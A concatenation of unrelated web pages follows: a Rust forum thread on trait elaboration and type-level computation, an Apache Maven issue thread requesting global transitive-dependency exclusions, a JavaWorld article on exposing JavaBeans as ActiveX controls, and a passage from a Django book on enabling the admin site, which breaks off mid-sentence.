your language instead of English. Django ships with translations for dozens of languages. For much more on Django’s internationalization features, see Chapter 19. Click the “Change” link in the “Users” row to load the change list page for users. Figure 6-3. The user change list page This page displays all users in the database; you can think of it as a prettied-up Web version of a SELECT * FROM auth_user; SQL query. If you’re following along with our ongoing example, you’ll only see one user here, assuming you’ve added only one, but once you have more users, you’ll probably find the filtering, sorting and searching options useful. Filtering options are at right, sorting is available by clicking a column header, and the search box at the top lets you search by username. Click the username of the user you created, and you’ll see the edit form for that user. Figure 6-4. The user edit form This page lets you change the attributes of the user, like the first/last names and various permissions. (Note that to change a user’s password, you should click “change password form” under the password field rather than editing the hashed code.) Another thing to note here is that fields of different types get different widgets – for example, date/time fields have calendar controls, boolean fields have checkboxes, character fields have simple text input fields. You can delete a record by clicking the delete button at the bottom left of its edit form. That’ll take you to a confirmation page, which, in some cases, will display any dependent objects that will be deleted, too. (For example, if you delete a publisher, any book with that publisher will be deleted, too!) You can add a record by clicking “Add” in the appropriate column of the admin home page. This will give you an empty version of the edit page, ready for you to fill out. 
You’ll also notice that the admin interface handles input validation for you. Try leaving a required field blank or putting an invalid date into a date field, and you’ll see those errors when you try to save, as shown in Figure 6-5.

Figure 6-5. An edit form displaying errors

When you edit an existing object, you’ll notice a History link in the upper-right corner of the window. Every change made through the admin interface is logged, and you can examine this log by clicking the History link (see Figure 6-6).

Figure 6-6. An object history page

There’s one crucial part we haven’t done yet. Let’s add our own models to the admin site, so we can add, change and delete objects in our custom database tables using this nice interface. We’ll continue the books example from Chapter 5, where we defined three models: Publisher, Author and Book. Within the books directory (mysite/books), create a file called admin.py, and type in the following lines of code:

from django.contrib import admin
from mysite.books.models import Publisher, Author, Book

admin.site.register(Publisher)
admin.site.register(Author)
admin.site.register(Book)

This code tells the Django admin site to offer an interface for each of these models. Once you’ve done this, go to your admin home page in your Web browser (http://127.0.0.1:8000/admin/), and you should see a “Books” section with links for Authors, Books and Publishers. (You might have to stop and start the runserver for the changes to take effect.) You now have a fully functional admin interface for each of those three models. That was easy!

Take some time to add and change records, to populate your database with some data. If you followed Chapter 5’s examples of creating Publisher objects (and you didn’t delete them), you’ll already see those records on the publisher change list page.

One feature worth mentioning here is the admin site’s handling of foreign keys and many-to-many relationships, both of which appear in the Book model. As a reminder, here’s what the Book model looks like:

class Book(models.Model):
    title = models.CharField(max_length=100)
    authors = models.ManyToManyField(Author)
    publisher = models.ForeignKey(Publisher)
    publication_date = models.DateField()

    def __unicode__(self):
        return self.title

On the Django admin site’s “Add book” page (http://127.0.0.1:8000/admin/books/book/add/), the publisher (a ForeignKey) is represented by a select box, and the authors field (a ManyToManyField) is represented by a multiple-select box. Both fields sit next to a green plus sign icon that lets you add related records of that type. For example, if you click the green plus sign next to the “Publisher” field, you’ll get a pop-up window that lets you add a publisher. After you successfully create the publisher in the pop-up, the “Add book” form will be updated with the newly created publisher. Slick.

Behind the scenes, how does the admin site work? It’s pretty straightforward. When Django loads your URLconf from urls.py at server startup, it executes the admin.autodiscover() statement that we added as part of activating the admin. This function iterates over your INSTALLED_APPS setting and looks for a file called admin.py in each installed app. If an admin.py exists in a given app, it executes the code in that file. In the admin.py in our books app, each call to admin.site.register() simply registers the given model with the admin. The admin site will only display an edit/change interface for models that have been explicitly registered.
The app django.contrib.auth includes its own admin.py, which is why Users and Groups showed up automatically in the admin. Other django.contrib apps, such as django.contrib.redirects, also add themselves to the admin, as do many third-party Django applications you might download from the Web.

Beyond that, the Django admin site is just a Django application, with its own models, templates, views and URLpatterns. You add it to your application by hooking it into your URLconf, just as you hook in your own views. You can inspect its templates, views and URLpatterns by poking around in django/contrib/admin in your copy of the Django codebase – but don’t be tempted to change anything directly in there, as there are plenty of hooks for you to customize the way the admin site works. (If you do decide to poke around the Django admin application, keep in mind it does some rather complicated things in reading metadata about models, so it would probably take a good amount of time to read and understand the code.)

After you play around with the admin site for a while, you’ll probably notice a limitation – the edit forms require every field to be filled out, whereas in many cases you’d want certain fields to be optional. Let’s say, for example, that we want our Author model’s email field to be optional – that is, a blank string should be allowed. In the real world, you might not have an e-mail address on file for every author.

To specify that the email field is optional, edit the Author model (which, as you’ll recall from Chapter 5, lives in mysite/books/models.py). Simply add blank=True to the email field, like so:

class Author(models.Model):
    first_name = models.CharField(max_length=30)
    last_name = models.CharField(max_length=40)
    email = models.EmailField(blank=True)

This tells Django that a blank value is indeed allowed for authors’ e-mail addresses. By default, all fields have blank=False, which means blank values are not allowed.

There’s something interesting happening here. Until now, with the exception of the __unicode__() method, our models have served as definitions of our database tables – Pythonic expressions of SQL CREATE TABLE statements, essentially. In adding blank=True, we have begun expanding our model beyond a simple definition of what the database table looks like. Now, our model class is starting to become a richer collection of knowledge about what Author objects are and what they can do. Not only is the email field represented by a VARCHAR column in the database; it’s also an optional field in contexts such as the Django admin site.

Once you’ve added that blank=True, reload the “Add author” edit form (http://127.0.0.1:8000/admin/books/author/add/), and you’ll notice the field’s label – “Email” – is no longer bolded. This signifies it’s not a required field. You can now add authors without needing to provide e-mail addresses; you won’t get the loud red “This field is required” message anymore when the field is submitted empty.

A common gotcha related to blank=True has to do with date and numeric fields, but it requires a fair amount of background explanation. SQL has its own way of specifying blank values – a special value called NULL. NULL could mean “unknown,” or “invalid,” or some other application-specific meaning. In SQL, a value of NULL is different from an empty string, just as the special Python object None is different from an empty Python string (""). This means it’s possible for a particular character field (e.g., a VARCHAR column) to contain both NULL values and empty string values.
This can cause unwanted ambiguity and confusion: “Why does this record have a NULL but this other one has an empty string? Is there a difference, or was the data just entered inconsistently?” And: “How do I get all the records that have a blank value – should I look for both NULL records and empty strings, or do I only select the ones with empty strings?”

To help avoid such ambiguity, Django’s automatically generated CREATE TABLE statements (which were covered in Chapter 5) add an explicit NOT NULL to each column definition. For example, here’s the generated statement for our Author model, from Chapter 5:

CREATE TABLE "books_author" (
    "id" serial NOT NULL PRIMARY KEY,
    "first_name" varchar(30) NOT NULL,
    "last_name" varchar(40) NOT NULL,
    "email" varchar(75) NOT NULL
);

In most cases, this default behavior is optimal for your application and will save you from data-inconsistency headaches. And it works nicely with the rest of Django, such as the Django admin site, which inserts an empty string (not a NULL value) when you leave a character field blank.

But there’s an exception with database column types that do not accept empty strings as valid values – such as dates, times and numbers. If you try to insert an empty string into a date or integer column, you’ll likely get a database error, depending on which database you’re using. (PostgreSQL, which is strict, will raise an exception here; MySQL might accept it or might not, depending on the version you’re using, the time of day and the phase of the moon.) In this case, NULL is the only way to specify an empty value. In Django models, you can specify that NULL is allowed by adding null=True to a field.

So that’s a long way of saying this: if you want to allow blank values in a date field (e.g., DateField, TimeField, DateTimeField) or numeric field (e.g., IntegerField, DecimalField, FloatField), you’ll need to use both null=True and blank=True.

For the sake of example, let’s change our Book model to allow a blank publication_date. Here’s the revised code:

class Book(models.Model):
    title = models.CharField(max_length=100)
    authors = models.ManyToManyField(Author)
    publisher = models.ForeignKey(Publisher)
    publication_date = models.DateField(blank=True, null=True)

Adding null=True is more complicated than adding blank=True, because null=True changes the semantics of the database – it removes the NOT NULL from the publication_date column definition – and Django won’t alter an existing table for you, so we need to update the schema ourselves. Recall that you can use manage.py dbshell to enter your database server’s shell. Here’s how to remove the NOT NULL in this particular case:

ALTER TABLE books_book ALTER COLUMN publication_date DROP NOT NULL;

(Note that this SQL syntax is specific to PostgreSQL.) We’ll cover schema changes in more depth in Chapter 10.

Bringing this back to the admin site, now the “Add book” edit form should allow for empty publication date values.

On the admin site’s edit forms, each field’s label is generated from its model field name. The algorithm is simple: Django just replaces underscores with spaces and capitalizes the first character, so, for example, the Book model’s publication_date field has the label “Publication date.” However, field names don’t always lend themselves to nice admin field labels, so in some cases you might want to customize a label. You can do this by specifying verbose_name in the appropriate model field.
For example, here’s how we can change the label of the Author.email field to “e-mail,” with a hyphen:

class Author(models.Model):
    first_name = models.CharField(max_length=30)
    last_name = models.CharField(max_length=40)
    email = models.EmailField(blank=True, verbose_name='e-mail')

Make that change and reload the server, and you should see the field’s new label on the author edit form. Note that you shouldn’t capitalize the first letter of a verbose_name unless it should always be capitalized (e.g., "USA state"). Django will automatically capitalize it when it needs to, and it will use the exact verbose_name value in other places that don’t require capitalization.

Finally, note that you can pass the verbose_name as a positional argument, for a slightly more compact syntax. This example is equivalent to the previous one:

class Author(models.Model):
    first_name = models.CharField(max_length=30)
    last_name = models.CharField(max_length=40)
    email = models.EmailField('e-mail', blank=True)

This won’t work with ManyToManyField or ForeignKey fields, though, because they require the first argument to be a model class. In those cases, specifying verbose_name explicitly is the way to go.

The changes we’ve made so far – blank=True, null=True and verbose_name – are really model-level changes, not admin-level changes. That is, these changes are fundamentally a part of the model and just so happen to be used by the admin site; there’s nothing admin-specific about them. Beyond these, the Django admin site offers a wealth of options that let you customize how the admin site works for a particular model. Such options live in ModelAdmin classes, which are classes that contain configuration for a specific model in a specific admin site instance.

Let’s dive into admin customization by specifying the fields that are displayed on the change list for our Author model. By default, the change list displays the result of __unicode__() for each object. In Chapter 5, we defined the __unicode__() method for Author objects to display the first name and last name together:

class Author(models.Model):
    first_name = models.CharField(max_length=30)
    last_name = models.CharField(max_length=40)
    email = models.EmailField(blank=True, verbose_name='e-mail')

    def __unicode__(self):
        return u'%s %s' % (self.first_name, self.last_name)

As a result, the change list for Author objects displays each author’s first name and last name together, as you can see in Figure 6-7.

Figure 6-7. The author change list page

We can improve on this default behavior by adding a few other fields to the change list display. It’d be handy, for example, to see each author’s e-mail address in this list, and it’d be nice to be able to sort by first and last name. To make this happen, we’ll define a ModelAdmin class for the Author model. This class is the key to customizing the admin, and one of the most basic things it lets you do is specify the list of fields to display on change list pages. Edit admin.py to make these changes:

from django.contrib import admin
from mysite.books.models import Publisher, Author, Book

class AuthorAdmin(admin.ModelAdmin):
    list_display = ('first_name', 'last_name', 'email')

admin.site.register(Publisher)
admin.site.register(Author, AuthorAdmin)
admin.site.register(Book)

Here’s what we’ve done: We created the class AuthorAdmin. This class, which subclasses django.contrib.admin.ModelAdmin, holds custom configuration for a specific admin model.
We’ve only specified one customization – list_display, which is set to a tuple of field names to display on the change list page. These field names must exist in the model, of course. We altered the admin.site.register() call to add AuthorAdmin after Author. You can read this as: “Register the Author model with the AuthorAdmin options.” The admin.site.register() function takes a ModelAdmin subclass as an optional second argument. If you don’t specify a second argument (as is the case for Publisher and Book), Django will use the default admin options for that model. With that tweak made, reload the author change list page, and you’ll see it’s now displaying three columns – the first name, last name and e-mail address. In addition, each of those columns is sortable by clicking on the column header. (See Figure 6-8.) Figure 6-8. The author change list page after list_display Next, let’s add a simple search bar. Add search_fields to the AuthorAdmin, like so: class AuthorAdmin(admin.ModelAdmin): list_display = ('first_name', 'last_name', 'email') search_fields = ('first_name', 'last_name') Reload the page in your browser, and you should see a search bar at the top. (See Figure 6-9.) We’ve just told the admin change list page to include a search bar that searches against the first_name and last_name fields. As a user might expect, this is case-insensitive and searches both fields, so searching for the string "bar" would find both an author with the first name Barney and an author with the last name Hobarson. Figure 6-9. The author change list page after search_fields Next, let’s add some date filters to our Book model’s change list page: from django.contrib import admin from mysite.books.models import Publisher, Author, Book class AuthorAdmin(admin.ModelAdmin): list_display = ('first_name', 'last_name', 'email') search_fields = ('first_name', 'last_name') class BookAdmin(admin.ModelAdmin): list_display = ('title', 'publisher', 'publication_date') list_filter = ('publication_date',) admin.site.register(Publisher) admin.site.register(Author, AuthorAdmin) admin.site.register(Book, BookAdmin) Here, because we’re dealing with a different set of options, we created a separate ModelAdmin class – BookAdmin. First, we defined a list_display just to make the change list look a bit nicer. Then, we used list_filter, which is set to a tuple of fields to use to create filters along the right side of the change list page. For date fields, Django provides shortcuts to filter the list to “Today,” “Past 7 days,” “This month” and “This year” – shortcuts that Django’s developers have found hit the common cases for filtering by date. Figure 6-10 shows what that looks like. Figure 6-10. The book change list page after list_filter list_filter also works on fields of other types, not just DateField. (Try it with BooleanField and ForeignKey fields, for example.) The filters show up as long as there are at least 2 values to choose from. Another way to offer date filters is to use the date_hierarchy admin option, like this: class BookAdmin(admin.ModelAdmin): list_display = ('title', 'publisher', 'publication_date') list_filter = ('publication_date',) date_hierarchy = 'publication_date' With this in place, the change list page gets a date drill-down navigation bar at the top of the list, as shown in Figure 6-11. It starts with a list of available years, then drills down into months and individual days. Figure 6-11. 
The book change list page after date_hierarchy

Note that date_hierarchy takes a string, not a tuple, because only one date field can be used to make the hierarchy.

Finally, let’s change the default ordering so that books on the change list page are always ordered descending by their publication date. By default, the change list orders objects according to their model’s ordering within class Meta (which we covered in Chapter 5) – but if you haven’t specified this ordering value, then the ordering is undefined.

class BookAdmin(admin.ModelAdmin):
    list_display = ('title', 'publisher', 'publication_date')
    list_filter = ('publication_date',)
    date_hierarchy = 'publication_date'
    ordering = ('-publication_date',)

This admin ordering option works exactly like the ordering in models’ class Meta, except that it only uses the first field name in the list. Just pass a list or tuple of field names, and add a minus sign to a field to use descending sort order. Reload the book change list to see this in action. Note that the “Publication date” header now includes a small arrow that indicates which way the records are sorted. (See Figure 6-12.)

Figure 6-12. The book change list page after ordering

We’ve covered the main change list options here. Using these options, you can make a very powerful, production-ready data-editing interface with only a few lines of code.

Just as the change list can be customized, edit forms can be customized in many ways. First, let’s customize the way fields are ordered. By default, the order of fields in an edit form corresponds to the order they’re defined in the model. We can change that using the fields option in our ModelAdmin subclass:

class BookAdmin(admin.ModelAdmin):
    list_display = ('title', 'publisher', 'publication_date')
    list_filter = ('publication_date',)
    date_hierarchy = 'publication_date'
    ordering = ('-publication_date',)
    fields = ('title', 'authors', 'publisher', 'publication_date')

After this change, the edit form for books will use the given ordering for fields. It’s slightly more natural to have the authors after the book title. Of course, the field order should depend on your data-entry workflow. Every form is different.

Another useful thing the fields option lets you do is to exclude certain fields from being edited entirely. Just leave out the field(s) you want to exclude. You might use this if your admin users are only trusted to edit a certain segment of your data, or if some of your fields are changed by an outside, automated process. For example, in our book database, we could hide the publication_date field from being editable:

class BookAdmin(admin.ModelAdmin):
    list_display = ('title', 'publisher', 'publication_date')
    list_filter = ('publication_date',)
    date_hierarchy = 'publication_date'
    ordering = ('-publication_date',)
    fields = ('title', 'authors', 'publisher')

As a result, the edit form for books doesn’t offer a way to specify the publication date. This could be useful, say, if you’re an editor who prefers that his authors not push back publication dates. (This is purely a hypothetical example, of course.) When a user uses this incomplete form to add a new book, Django will simply set the publication_date to None – so make sure that field has null=True.

Another commonly used edit-form customization has to do with many-to-many fields. As we’ve seen on the edit form for books, the admin site represents each ManyToManyField as a multiple-select box, which is the most logical HTML input widget to use – but multiple-select boxes can be difficult to use.
If you want to select multiple items, you have to hold down the control key, or command on a Mac, to do so. The admin site helpfully inserts a bit of text that explains this, but, still, it gets unwieldy when your field contains hundreds of options.

The admin site’s solution is filter_horizontal. Let’s add that to BookAdmin and see what it does.

class BookAdmin(admin.ModelAdmin):
    list_display = ('title', 'publisher', 'publication_date')
    list_filter = ('publication_date',)
    date_hierarchy = 'publication_date'
    ordering = ('-publication_date',)
    filter_horizontal = ('authors',)

(If you’re following along, note that we’ve also removed the fields option to restore all the fields in the edit form.) Reload the edit form for books, and you’ll see that the “Authors” section now uses a fancy JavaScript filter interface that lets you search through the options dynamically and move specific authors from “Available authors” to the “Chosen authors” box, and vice versa.

Figure 6-13. The book edit form after adding filter_horizontal

We’d highly recommend using filter_horizontal for any ManyToManyField that has more than 10 items. It’s far easier to use than a simple multiple-select widget. Also, note you can use filter_horizontal for multiple fields – just specify each name in the tuple.

ModelAdmin classes also support a filter_vertical option. This works exactly like filter_horizontal, but the resulting JavaScript interface stacks the two boxes vertically instead of horizontally. It’s a matter of personal taste.

filter_horizontal and filter_vertical only work on ManyToManyField fields, not ForeignKey fields. By default, the admin site uses simple <select> boxes for ForeignKey fields, but, as with ManyToManyField, sometimes you don’t want to incur the overhead of having to select all the related objects to display in the drop-down. For example, if our book database grows to include thousands of publishers, the “Add book” form could take a while to load, because it would have to load every publisher for display in the <select> box.

The way to fix this is to use an option called raw_id_fields. Set this to a tuple of ForeignKey field names, and those fields will be displayed in the admin with a simple text input box (<input type="text">) instead of a <select>. See Figure 6-14.

class BookAdmin(admin.ModelAdmin):
    list_display = ('title', 'publisher', 'publication_date')
    list_filter = ('publication_date',)
    date_hierarchy = 'publication_date'
    ordering = ('-publication_date',)
    filter_horizontal = ('authors',)
    raw_id_fields = ('publisher',)

Figure 6-14. The book edit form after adding raw_id_fields

What do you enter in this input box? The database ID of the publisher. Given that humans don’t normally memorize database IDs, there’s also a magnifying-glass icon that you can click to pull up a pop-up window, from which you can select the publisher to add.

Because you’re logged in as a superuser, you have access to create, edit, and delete any object. Naturally, different environments require different permission systems – not everybody can or should be a superuser. Django’s admin site uses a permissions system that you can use to give specific users access only to the portions of the interface that they need. These user accounts are meant to be generic enough to be used outside of the admin interface, but we’ll just treat them as admin user accounts for now. In Chapter 14, we’ll cover how to integrate user accounts with the rest of your site (i.e., not just the admin site).
You can edit users and permissions through the admin interface just like any other object. We saw this earlier in this chapter, when we played around with the User and Group sections of the admin. User objects have the standard username, password, e-mail and real name fields you might expect, along with a set of fields that define what the user is allowed to do in the admin interface. First, there’s a set of three boolean flags: the “active” flag controls whether the user may log in at all; the “staff” flag controls whether the user is allowed into the admin interface; and the “superuser” flag gives the user full access to add, change and delete any item in the admin.

“Normal” admin users – that is, active, non-superuser staff members – are granted admin access through assigned permissions. Each object editable through the admin interface (e.g., books, authors, publishers) has three permissions: a create permission, an edit permission and a delete permission. Assigning permissions to a user grants the user access to do what is described by those permissions.

When you create a user, that user has no permissions, and it’s up to you to give the user specific permissions. For example, you can give a user permission to add and change publishers, but not permission to delete them. Note that these permissions are defined per-model, not per-object – so they let you say “John can make changes to any book,” but they don’t let you say “John can make changes to any book published by Apress.” The latter functionality, per-object permissions, is a bit more complicated and is outside the scope of this book but is covered in the Django documentation.

Note: Access to edit users and permissions is also controlled by this permission system. If you give someone permission to edit users, she will be able to edit her own permissions, which might not be what you want! Giving a user permission to edit users is essentially turning a user into a superuser.

You can also assign users to groups. A group is simply a set of permissions to apply to all members of that group. Groups are useful for granting identical permissions to a subset of users.

After having worked through this chapter, you should have a good idea of how to use Django’s admin site. But we want to make a point of covering when and why you might want to use it – and when not to use it. Django’s admin site especially shines when nontechnical users need to be able to enter data; that’s the purpose behind the feature, after all. At the newspaper where Django was first developed, development of a typical online feature – say, a special report on water quality in the municipal supply – would go something like this: the reporter responsible for the story meets with a developer and describes the available data; the developer defines Django models to fit that data and sets up the admin site; and while the reporter enters data into the admin, the developer can focus on building the publicly accessible views and templates. In other words, the raison d’être of Django’s admin interface is facilitating the simultaneous work of content producers and programmers.

However, beyond these obvious data entry tasks, the admin site is useful in a few other cases: inspecting data models (once you’ve defined a new model, it can be quite useful to call it up in the admin interface and enter some dummy data, which often reveals data-modeling mistakes early) and managing acquired data (for applications that rely on data coming from external sources, the admin site gives you an easy way to inspect or edit that data).

One final point we want to make clear is: the admin site is not a be-all and end-all. Over the years, we’ve seen it hacked and chopped up to serve a variety of functions it wasn’t intended to serve. It’s not intended to be a public interface to data, nor is it intended to allow for sophisticated sorting and searching of your data. As we said early in this chapter, it’s for trusted site administrators. Keeping this sweet spot in mind is the key to effective admin-site usage.
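As a small illustration of the per-model permissions described above (a sketch, not code from the book; it assumes the books app from this chapter and Django’s default permission codenames such as 'add_publisher' and 'change_publisher'), you could grant John add and change access to publishers from a Python shell like this:

from django.contrib.auth.models import User, Permission

john = User.objects.get(username='john')
add_perm = Permission.objects.get(codename='add_publisher')
change_perm = Permission.objects.get(codename='change_publisher')
# Deliberately no 'delete_publisher': John can add and change
# publishers, but not delete them.
john.user_permissions.add(add_perm, change_perm)

This is exactly what assigning the same permissions through the admin’s user edit form does behind the scenes.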
http://www.djangobook.com/en/2.0/chapter06.html
CC-MAIN-2014-42
en
refinedweb
<< Showing messages 1 through 5 of 5. - Found the cause of the error. 2008-01-05 16:43:05 TechG1rl [View] I found the problem :) But how to fix it?? Opening the home recipe list page, I viewed the source and found this line: ***** <h1>Online Cookbook</h1> <table border="1"> <tr> <th width="60%">Recipe</em</th> <th width="20%">Category</th> <th width="20%">Date</em</th> </tr> ********* The first tag is not closed fully. But this is not something that I typed in myself. I will keep hunting, but if you know how to fix it that would be greatly appreciated :) Cheers, Tara - assert_select 2008-01-02 23:33:18 TechG1rl [View] Hi, I am hoping someone can help me. I was so excited to see that the new tutorial was up today, as last week I had just finished the July tutorial :) I keep getting these errors on the first integration test. 1. If I run this test: ********** require File.dirname(__FILE__) + '/../test_helper' class Cookbook2IntegrationTest < ActionController::IntegrationTest fixtures :categories fixtures :recipes def test_the_home_page browse_to_the_home_page check_the_home_page_title end private def browse_to_the_home_page get "/" assert_response :success assert_template "recipe/list" end def check_the_home_page_title assert_select "h1", {:text=>"Online Cookbook"} end end *********** I get this response: ********* Loaded suite cookbook2_integration_test Started E Finished in 0.245284 seconds. 1) Error: test_the_home_page(Cookbook2IntegrationTest): RuntimeError: expected > (got "" for /var/rails/cookbook2/config/../vendor/rails/actionpack/lib/action_controller/assertions/../vendor/html-scanner/html/node.rb:193:in `parse' /var/rails/cookbook2/config/../vendor/rails/actionpack/lib/action_controller/assertions/../vendor/html-scanner/html/document.rb:20:in `initialize' /var/rails/cookbook2/config/../vendor/rails/actionpack/lib/action_controller/test_process.rb:439:in `new' /var/rails/cookbook2/config/../vendor/rails/actionpack/lib/action_controller/test_process.rb:439:in `html_document' /var/rails/cookbook2/config/../vendor/rails/actionpack/lib/action_controller/assertions/selector_assertions.rb:555:in `response_from_page_or_rjs' /var/rails/cookbook2/config/../vendor/rails/actionpack/lib/action_controller/assertions/selector_assertions.rb:197:in `assert_select' cookbook2_integration_test.rb:21:in `check_the_home_page_title' cookbook2_integration_test.rb:10:in `test_the_home_page' /var/rails/cookbook2/config/../vendor/rails/actionpack/lib/action_controller/integration.rb:453:in `run' 1 tests, 2 assertions, 0 failures, 1 errors ******* I am modifying the tutorial as I go for my system, which is Ubuntu Feisty Fawn, Apache2 as the webserver. If I run the test without assert_select, it passes with no errors. So, I am wondering if maybe assert_select is not loaded correctly in my rails version???? But, I don't know. Thanks in advance for any help on this. Happy New Year! - assert_select 2008-01-03 08:18:51 Bill Walton | [View] Hi TechG1rl, Happy Opening the home recipe list page, I viewed the source and found this: ***** <h1>Online Cookbook</h1> <table border="1"> <tr> <th width="60%">Recipe</em</th> <th width="20%">Category</th> <th width="20%">Date</em</th> </tr> ********* The first and third tag is not closed fully. I found this is from the recipe/list file so I opened that up and added the end tags. 
Re-ran the test and got another error, "method href not found", so on a hunch I changed this: assert_select "a", {:text=>"Create new recipe", href=>"recipe/new"} to this (colon in front of href was missing): assert_select "a", {:text=>"Create new recipe", :href=>"recipe/new"} re-ran the test and no more failures :) yay we can move on. Thanks for your speedy reply earlier. Cheers, Tara
http://oreillynet.com/pub/a/ruby/2008/01/02/cookin-with-ruby-on-rails---integration-tests.html?page=7
CC-MAIN-2014-42
en
refinedweb
FlipView represents an item control which displays one item at a time and enables the user to flip through a collection of items. Typically such a control is used for traversing through a product catalog, book information and so on. Technically, the FlipView is a control provided to Windows Store Apps through the Windows Library for JavaScript (WinJS). The data for a FlipView is made available through an IListDataSource. (Note: you can get data from external web sources like a web service, WCF service or Web API in JSON format.) We will use the FlipView for iterating through images passed to it from a WinJS List object.

Step 1: Open VS2012 and create a new Windows Store App using JavaScript. Name it 'Store_JS_FlipView'. In this project add some images to the 'images' folder. (I have some images as Mahesh.png, SachinN.png, SachinS.png, KiranP.jpg).

Step 2: In the default.html add the below HTML code:

<div id="trgFilpView" data-win-control="WinJS.UI.FlipView"></div>

Note that the <div> is set to the WinJS.UI.FlipView using the data-win-control property.

Step 3: Add the style for the FlipView in the default.html as below:

<style type="text/css">
    #trgFilpView {
        width: 600px;
        height: 500px;
        border: solid 1px black;
        background-color: coral;
    }
</style>

Step 4: Since the FlipView accepts an IListDataSource, we need to define it as JSON data. To do this, add a new JavaScript file to the project, name it 'dataInformation.js' and add the following code in it:

(function () {
    "use strict";
    //The JavaScript array.
    var trainerArray = [
        { name: "Sachin Shukre", image: "images/SachinS.jpg", description: "The Senior Corporate Trainer for C,C++" },
        { name: "Mahesh Sabnis", image: "images/Mahesh.png", description: "The Senior Corporate Trainer for .NET" },
        { name: "Sachin Nimbalkar", image: "images/SachinN.jpg", description: "The Senior Corporate Trainer for Client Side Frameworks" },
        { name: "Mahesh Sabnis", image: "images/KiranP.jpg", description: "The Senior Corporate Trainer for C# and ASP.NET" }];
    //Define the List from the array.
    var trainersList = new WinJS.Binding.List(trainerArray);
    //This is the private data.
    //To expose data publicly, define a namespace which defines
    //the object containing the property-value pair.
    //The property is the public name of the member and the value is the variable which contains the data.
    var trainersInfo = {
        trList: trainersList
    };
    WinJS.Namespace.define("TrainersInformation", trainersInfo);
})();

The above code defines a JSON array with hard-coded data in it. This array is then passed to the 'trainersList' object, defined as a List using WinJS.Binding.List(). Since the array and the List are declared as private objects, they will not be exposed to the FlipView. To expose them, we define a namespace containing an object with a property/value pair, using WinJS.Namespace.define(). 'trList' is the public property which contains the 'trainersList'; this is what is exposed to the FlipView.

Step 5: To display data in the FlipView, we need to define a template for showing the repeated data. (Note: this is conceptually similar to templates in XAML.) In the default.html add the below <div> tag, which is set to the WinJS.Binding.Template:

<!--Define the Template Here-->
<div id="DataTemplate" data-win-control="WinJS.Binding.Template">
    <div>
        <img src="#" data-win-bind="src: image" />
        <div>
            <h3 data-win-bind="innerText: name"></h3>
            <h4 data-win-bind="innerText: description"></h4>
        </div>
    </div>
</div>
<!--Ends Here-->

The above template contains an <img> bound to the 'image' property, which comes from the List defined in Step 4.
The <h3> and <h4> headers are used for displaying the 'name' and 'description' declared in the array.

Step 6: To display the data in the FlipView, change the <div> with id 'trgFilpView' as shown below:

<div id="trgFilpView" data-win-control="WinJS.UI.FlipView"
    data-win-options="{ itemDataSource: TrainersInformation.trList.dataSource,
                        itemTemplate: DataTemplate }">
</div>

To connect to the data, the itemDataSource property of the FlipView is used. This property is assigned the trList object defined in the namespace in Step 4. The itemTemplate property is set to the DataTemplate defined in Step 5.

Run the application and you will see the first record from the array. Click the flip navigation button and the next record will be displayed.

Conclusion
We saw how to bind an array of images to a FlipView control in WinJS. We can use the FlipView control to display any page-wise data, for example magazines, books etc. The entire source code of this article is available for download.
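As a small extension of the example (a sketch, not part of the original article's download), the FlipView can also be driven from code: its winControl exposes next() and previous() methods and a currentPage property, so a hypothetical 'Next' button could be wired up like this:

// Assumes a <button id="btnNext">Next</button> somewhere in default.html.
var flipView = document.getElementById("trgFilpView").winControl;
document.getElementById("btnNext").addEventListener("click", function () {
    // next() returns a promise completing with true if the view moved.
    flipView.next().done(function (moved) {
        if (!moved) {
            flipView.currentPage = 0; // wrap around to the first item
        }
    });
});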
http://www.devcurry.com/2013/03/using-flipview-control-in-windows-store.html
CC-MAIN-2014-42
en
refinedweb
26 March 2012 09:00 [Source: ICIS news]

Yara investigation finds unacceptable payments at Swiss JV
Yara International has uncovered unacceptable payments from a former joint venture in Switzerland.

Shell lifts Moerdijk cracker products force majeure
Shell Chemicals has lifted the force majeure on cracker products from its Moerdijk facility in the Netherlands.

Europe PP buyers paying huge hikes in March
Polypropylene (PP) buyers in Europe are paying huge price hikes in March.

Styrolution to cut SM, PS offtake in Marl
Styrolution will no longer take styrene monomer (SM) and polystyrene (PS) from its joint-venture plants in Marl, Germany, while it increases styrene copolymer capacities in Germany, India and South Korea, the company said.
http://www.icis.com/Articles/2012/03/26/9544570/europe-top-stories-weekly-summary.html
CC-MAIN-2014-42
en
refinedweb
Hi there ..... Just to let you know Cheatah no longer seems to compile against the latest CVS (using the namespace feature). I've managed to get my own module-making tools to compile and link OK after adding the following (from addvs.cpp) -

#ifndef NO_SWORD_NAMESPACE
using sword::SWMgr;
using sword::RawText;
using sword::SWKey;
using sword::VerseKey;
using sword::ListKey;
using sword::SWModule;
#endif

I don't know how to alter Cheatah - and I only use it to check out the library each time I rebuild, but I thought I ought to report it.

God bless, Barry

--
From Barry Drake (The Revd), minister of the Arnold and the Netherfield United Reformed Churches, Nottingham (see our church homepages).
http://www.crosswire.org/pipermail/sword-devel/2002-October/016301.html
CC-MAIN-2014-42
en
refinedweb
import "github.com/mewkiz84/bytesx" Package bytesx implements highly optimized byte functions which extends the bytes package in the standard library (Currently x86 64-bit only) func EqualThreshold(a, b []byte, t uint8) bool EqualThreshold returns true if b does not differ in value more than t from the corresponding byte in a. t may take any value from 0 to 255 where 0 is exact match and 255 will match any string. If t is 1 and a is "MNO" and b is "LNP" than EqualThreshold will return true while it will return false if b is "LNQ" or "KNO". The equality check is only made untill the shortest of a and b. func IndexNotEqual(a, b []byte) int IndexNotEqual returns the index of the first non matching byte between a and b, or -1 if a and b are equal untill the shortest of the two. Updated 2013-11-07. Refresh now. Tools for package owners.
http://godoc.org/github.com/mewkiz84/bytesx
CC-MAIN-2014-42
en
refinedweb
NAME
log1p - compute a natural logarithm

SYNOPSIS
#include <math.h>
double log1p (double x);

DESCRIPTION
The log1p() function computes loge(1.0 + x). The value of x must be greater than -1.0.

RETURN VALUE
Upon successful completion, log1p() returns the natural logarithm of 1.0 + x. If x is NaN, log1p() returns NaN and may set errno to [EDOM]. If x is less than -1.0, log1p() returns -HUGE_VAL or NaN and sets errno to [EDOM]. If x is -1.0, log1p() returns -HUGE_VAL and may set errno to [ERANGE].

ERRORS
The log1p() function will fail if:
- [EDOM] - The value of x is less than -1.0.
The log1p() function may fail and set errno to:
- [EDOM] - The value of x is NaN.
- [ERANGE] - The value of x is -1.0.
No other errors will occur.

EXAMPLES
None.

APPLICATION USAGE
None.

FUTURE DIRECTIONS
None.

SEE ALSO
log(), <math.h>.
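The specification lists no example; as an illustrative sketch (not part of the specification), a typical call with errno checking might look like this:

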